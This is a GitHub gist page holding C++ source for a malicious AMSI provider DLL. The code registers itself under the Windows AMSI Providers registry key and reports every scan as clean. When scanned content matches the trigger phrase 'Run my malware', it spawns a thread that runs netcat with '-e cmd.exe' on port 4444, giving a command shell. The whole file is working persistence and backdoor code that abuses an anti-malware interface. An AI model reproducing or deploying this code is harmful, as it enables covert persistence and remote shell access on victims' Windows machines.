Skip to content

Instantly share code, notes, and snippets.

@analyticsearch
Forked from b4rtik/AmsiProvider.cpp
Created December 16, 2022 07:40
Show Gist options
  • Save analyticsearch/a325154311863d0003df3348cbfa647b to your computer and use it in GitHub Desktop.
Save analyticsearch/a325154311863d0003df3348cbfa647b to your computer and use it in GitHub Desktop.
#include "stdafx.h"
#include <process.h>
using namespace Microsoft::WRL;
HMODULE g_currentModule;
BOOL APIENTRY DllMain(HMODULE module, DWORD reason, LPVOID reserved)
{
switch (reason)
{
case DLL_PROCESS_ATTACH:
g_currentModule = module;
DisableThreadLibraryCalls(module);
Module<InProc>::GetModule().Create();
break;
case DLL_PROCESS_DETACH:
Module<InProc>::GetModule().Terminate();
break;
}
return TRUE;
}
#pragma region COM server boilerplate
HRESULT WINAPI DllCanUnloadNow()
{
return Module<InProc>::GetModule().Terminate() ? S_OK : S_FALSE;
}
STDAPI DllGetClassObject(_In_ REFCLSID rclsid, _In_ REFIID riid, _Outptr_ LPVOID FAR* ppv)
{
return Module<InProc>::GetModule().GetClassObject(rclsid, riid, ppv);
}
#pragma endregion
class
DECLSPEC_UUID("2E5D8A62-77F9-4F7B-A90C-2744820139B2")
SampleAmsiProvider : public RuntimeClass<RuntimeClassFlags<ClassicCom>, IAntimalwareProvider, FtmBase>
{
public:
IFACEMETHOD(Scan)(_In_ IAmsiStream* stream, _Out_ AMSI_RESULT* result) override;
IFACEMETHOD_(void, CloseSession)(_In_ ULONGLONG session) override;
IFACEMETHOD(DisplayName)(_Outptr_ LPWSTR* displayName) override;
private:
LONG m_requestNumber = 0;
};
HRESULT SampleAmsiProvider::Scan(_In_ IAmsiStream* stream, _Out_ AMSI_RESULT* result)
{
_RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString");
_RtlEqualUnicodeString RtlEqualUnicodeString = (_RtlEqualUnicodeString)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlEqualUnicodeString");
UNICODE_STRING myTriggerString1;
RtlInitUnicodeString(&myTriggerString1, L"Run my malware");
UNICODE_STRING myTriggerString2;
RtlInitUnicodeString(&myTriggerString2, L"\"Run my malware\"");
UNICODE_STRING myTriggerString3;
RtlInitUnicodeString(&myTriggerString3, L"'Run my malware'");
ULONG actualSize;
ULONGLONG contentSize;
if (!SUCCEEDED(stream->GetAttribute(AMSI_ATTRIBUTE_CONTENT_SIZE, sizeof(ULONGLONG), reinterpret_cast<PBYTE>(&contentSize), &actualSize)) &&
actualSize == sizeof(ULONGLONG))
{
*result = AMSI_RESULT_NOT_DETECTED;
return S_OK;
}
PBYTE contentAddress;
if (!SUCCEEDED(stream->GetAttribute(AMSI_ATTRIBUTE_CONTENT_ADDRESS, sizeof(PBYTE), reinterpret_cast<PBYTE>(&contentAddress), &actualSize)) &&
actualSize == sizeof(PBYTE))
{
*result = AMSI_RESULT_NOT_DETECTED;
return S_OK;
}
if (contentAddress)
{
if (contentSize < 50)
{
UNICODE_STRING myuni;
myuni.Buffer = (PWSTR)contentAddress;
myuni.Length = (USHORT)contentSize;
myuni.MaximumLength = (USHORT)contentSize;
if (RtlEqualUnicodeString(&myTriggerString1, &myuni, TRUE) || RtlEqualUnicodeString(&myTriggerString2, &myuni, TRUE) || RtlEqualUnicodeString(&myTriggerString3, &myuni, TRUE))
{
DWORD thId;
CreateThread(NULL, 0, MyThreadFunction, NULL, 0, &thId);
}
}
}
*result = AMSI_RESULT_NOT_DETECTED;
return S_OK;
}
void SampleAmsiProvider::CloseSession(_In_ ULONGLONG session)
{
}
HRESULT SampleAmsiProvider::DisplayName(_Outptr_ LPWSTR *displayName)
{
*displayName = const_cast<LPWSTR>(L"Sample AMSI Provider");
return S_OK;
}
CoCreatableClass(SampleAmsiProvider);
DWORD WINAPI MyThreadFunction(LPVOID lpParam)
{
system("c:\\Temp\\nc64.exe 127.0.0.1 4444 -e cmd.exe");
return 0;
}
#pragma region Install / uninstall
HRESULT SetKeyStringValue(_In_ HKEY key, _In_opt_ PCWSTR subkey, _In_opt_ PCWSTR valueName, _In_ PCWSTR stringValue)
{
LONG status = RegSetKeyValue(key, subkey, valueName, REG_SZ, stringValue, (wcslen(stringValue) + 1) * sizeof(wchar_t));
return HRESULT_FROM_WIN32(status);
}
STDAPI DllRegisterServer()
{
wchar_t modulePath[MAX_PATH];
if (GetModuleFileName(g_currentModule, modulePath, ARRAYSIZE(modulePath)) >= ARRAYSIZE(modulePath))
{
return E_UNEXPECTED;
}
wchar_t clsidString[40];
if (StringFromGUID2(__uuidof(SampleAmsiProvider), clsidString, ARRAYSIZE(clsidString)) == 0)
{
return E_UNEXPECTED;
}
wchar_t keyPath[200];
HRESULT hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Classes\\CLSID\\%ls", clsidString);
if (FAILED(hr)) return hr;
hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, nullptr, L"SampleAmsiProvider");
if (FAILED(hr)) return hr;
hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Classes\\CLSID\\%ls\\InProcServer32", clsidString);
if (FAILED(hr)) return hr;
hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, nullptr, modulePath);
if (FAILED(hr)) return hr;
hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, L"ThreadingModel", L"Both");
if (FAILED(hr)) return hr;
// Register this CLSID as an anti-malware provider.
hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Microsoft\\AMSI\\Providers\\%ls", clsidString);
if (FAILED(hr)) return hr;
hr = SetKeyStringValue(HKEY_LOCAL_MACHINE, keyPath, nullptr, L"SampleAmsiProvider");
if (FAILED(hr)) return hr;
return S_OK;
}
STDAPI DllUnregisterServer()
{
wchar_t clsidString[40];
if (StringFromGUID2(__uuidof(SampleAmsiProvider), clsidString, ARRAYSIZE(clsidString)) == 0)
{
return E_UNEXPECTED;
}
// Unregister this CLSID as an anti-malware provider.
wchar_t keyPath[200];
HRESULT hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Microsoft\\AMSI\\Providers\\%ls", clsidString);
if (FAILED(hr)) return hr;
LONG status = RegDeleteTree(HKEY_LOCAL_MACHINE, keyPath);
if (status != NO_ERROR && status != ERROR_PATH_NOT_FOUND) return HRESULT_FROM_WIN32(status);
// Unregister this CLSID as a COM server.
hr = StringCchPrintf(keyPath, ARRAYSIZE(keyPath), L"Software\\Classes\\CLSID\\%ls", clsidString);
if (FAILED(hr)) return hr;
status = RegDeleteTree(HKEY_LOCAL_MACHINE, keyPath);
if (status != NO_ERROR && status != ERROR_PATH_NOT_FOUND) return HRESULT_FROM_WIN32(status);
return S_OK;
}
#pragma endregion
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment